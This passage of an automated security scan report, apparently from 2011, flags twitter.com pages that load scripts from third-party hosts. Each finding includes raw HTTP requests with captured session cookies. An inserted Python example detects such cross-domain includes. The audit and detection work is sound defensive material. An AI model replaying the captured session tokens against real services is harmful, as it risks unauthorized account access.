<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.454. http://twitter.com/malsup/lists/memberships

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/lists/memberships

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/lists/memberships HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:01 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225121-12124-31617
ETag: "4763ea75ad15028df2a41e2db3e3c3af"
Last-Modified: Fri, 28 Jan 2011 14:32:01 GMT
X-Runtime: 0.21369
Content-Type: text/html; charset=utf-8
Content-Length: 53194
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlMzc5MzNmYzZkMTU5YjRmMWNmMGU2YmE0NzZiODE1%250AMDY6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--a2eb394c4b1170fa994e9fcffc65e4f2665eae0d; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.455. http://twitter.com/malsup/status/28104072506638336

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/28104072506638336

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/28104072506638336 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:08:20 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234500-586-43889
ETag: "6152ee84f48b902da1ca1248ca61a58e"
Last-Modified: Fri, 28 Jan 2011 17:08:20 GMT
X-Runtime: 0.26318
Content-Type: text/html; charset=utf-8
Content-Length: 13545
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODEwNDA3MjUwNjYzODMzNjoVaW5fbmV3X3VzZXJfZmxvdzA6DGNz%250AcmZfaWQiJWFiYzQ1NWM5YjQ1NWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9u%250AYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--5f1833026704ac7987b23967a576a8fc84684dd1; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.456. http://twitter.com/malsup/status/28104072506638336

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/28104072506638336

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/28104072506638336 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:00 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225119-26933-12549
ETag: "aaf26de7030048d1196c313150091a40"
Last-Modified: Fri, 28 Jan 2011 14:31:59 GMT
X-Runtime: 0.04519
Content-Type: text/html; charset=utf-8
Content-Length: 13678
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODEwNDA3MjUwNjYzODMzNjoMY3NyZl9pZCIlZmU4MjBhZmJhOGQ0%250AYmNiYWY5MGQ1NGFjZDk3ZTExYjQ6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lk%250AIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AAA%253D%253D--80cd1a73095b80de52be3483ee35ac58b2872ef0; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.457. http://twitter.com/malsup/status/28104072506638336

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/28104072506638336

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/28104072506638336 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:22 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224902-83509-7686
ETag: "149ada5c80b5766764f47c9a0f52a4c1"
Last-Modified: Fri, 28 Jan 2011 14:28:22 GMT
X-Runtime: 0.06341
Content-Type: text/html; charset=utf-8
Content-Length: 13677
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODEwNDA3MjUwNjYzODMzNjoMY3NyZl9pZCIlNWNkZDU3ZjRlMjQy%250AN2Q4MTA4MmM0NDFhZDg5MjY2YzI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--e0b142d583ea9a31999ba97ee4a16fb9f6b484a2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.458. http://twitter.com/malsup/status/28148269980852225

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/28148269980852225

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/28148269980852225 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:59 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225119-97856-16873
ETag: "7b6e954d574e7f7d8067cc5a60d82990"
Last-Modified: Fri, 28 Jan 2011 14:31:59 GMT
X-Runtime: 0.05505
Content-Type: text/html; charset=utf-8
Content-Length: 13573
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODE0ODI2OTk4MDg1MjIyNToMY3NyZl9pZCIlNjJkN2Q0NGJmZjQ0%250AY2Y5MzZjNDliYTEzMmRjZWJiODc6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lk%250AIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AAA%253D%253D--5b2e0612298938a13e49d0fd90127d9e47514304; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.459. http://twitter.com/malsup/status/28148269980852225

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/28148269980852225

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/28148269980852225 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:21 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224901-67249-7024
ETag: "c7d9e91873275c60e828220131e3d24e"
Last-Modified: Fri, 28 Jan 2011 14:28:21 GMT
X-Runtime: 0.05497
Content-Type: text/html; charset=utf-8
Content-Length: 13572
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODE0ODI2OTk4MDg1MjIyNToMY3NyZl9pZCIlMjhjNDM2MTNkMDIw%250ANDA2NjMwMjM2MDE1YmViMWNhOWI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--53ddf4f09f23d5fa1c2283d7064ce993e37290a9; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.460. http://twitter.com/malsup/status/28172705220009984

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/28172705220009984

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/28172705220009984 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:23 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224903-20411-54978
ETag: "1d3dce7c8cc9257454fd818d254f7abb"
Last-Modified: Fri, 28 Jan 2011 14:28:23 GMT
X-Runtime: 0.29056
Content-Type: text/html; charset=utf-8
Content-Length: 13615
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODE3MjcwNTIyMDAwOTk4NDoMY3NyZl9pZCIlNDAwZTU3MDIwZTI2%250AOGRjM2FkZTAwZDZiN2FkNDkxZTY6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--f11730b84ce50cbf6bd93caab79b94724f2f389a; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
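Every entry from 18.451 through 18.460 above is the same scanner finding: the twitter.com page pulls in script files from hosts it does not serve itself (ajax.googleapis.com, the a0 to a3.twimg.com CDN hosts and www.google.com). A script loaded that way runs with the full privileges of the including page, so a compromise of any of those hosts, or of the path between them and the browser on plain http, is equivalent to a stored XSS on twitter.com. The check below reproduces the finding offline so it can be run against any captured response rather than only inside the scanner. It is an added example and not code from the scan report or from the scanner vendor: the HTML fragment is a constructed sample that mirrors the script tags visible in the 18.451 response body plus one made-up same-host include, and the function and constant names are this example's own. It also records whether each tag carries an integrity attribute, the Subresource Integrity control that did not exist when this report was generated but is the check a reviewer would want today.

```python
"""Cross-domain script include check, modelled on the Burp finding above.

Added example, not part of the original scan report. SAMPLE_HTML is a
constructed fragment mirroring the <script> tags seen in the twitter.com
responses; cross_domain_scripts, distinct_hosts and _ScriptCollector are
names chosen for this example.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _ScriptCollector(HTMLParser):
    """Collects (src, has_integrity) for every <script src=...> tag."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        attributes = dict(attrs)          # attribute names arrive lower-cased
        src = attributes.get("src")
        if src:                           # inline <script> blocks have no src
            self.scripts.append((src, "integrity" in attributes))


def cross_domain_scripts(page_url, html):
    """Return the script includes whose host differs from the page's host.

    Each result holds the absolute script URL, its host and whether the tag
    carried an integrity attribute (SRI). The comparison is on the full host,
    not the registrable domain, which is exactly what flags a1.twimg.com on a
    twitter.com page: the page trusts a host it does not serve itself.
    """
    page_host = urlsplit(page_url).hostname
    collector = _ScriptCollector()
    collector.feed(html)
    findings = []
    for src, has_integrity in collector.scripts:
        abs_url = urljoin(page_url, src)  # resolve relative src against the page
        host = urlsplit(abs_url).hostname
        if host and host != page_host:
            findings.append({"url": abs_url, "host": host, "sri": has_integrity})
    return findings


def distinct_hosts(findings):
    """Sorted list of the third-party hosts a page depends on for script."""
    return sorted({f["host"] for f in findings})


# Constructed sample: three tags copied from the 18.451 response body, plus a
# made-up same-host include and an inline block that must both be ignored.
SAMPLE_PAGE = "http://twitter.com/malsup/favorites"
SAMPLE_HTML = """
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="/javascripts/local.js"></script>
<script type="text/javascript">var inline = 1;</script>
"""

if __name__ == "__main__":
    for f in cross_domain_scripts(SAMPLE_PAGE, SAMPLE_HTML):
        print(f"{f['host']:<24} sri={f['sri']}  {f['url']}")
```

Run against the sample it reports the three third-party includes and none of them carries an integrity attribute; the same-host include and the inline block are not reported. Feed it the body of any captured response together with the request URL to get the list the scanner's issue detail would have shown.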

18.461. http://twitter.com/malsup/status/28172705220009984

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/28172705220009984

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/28172705220009984 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
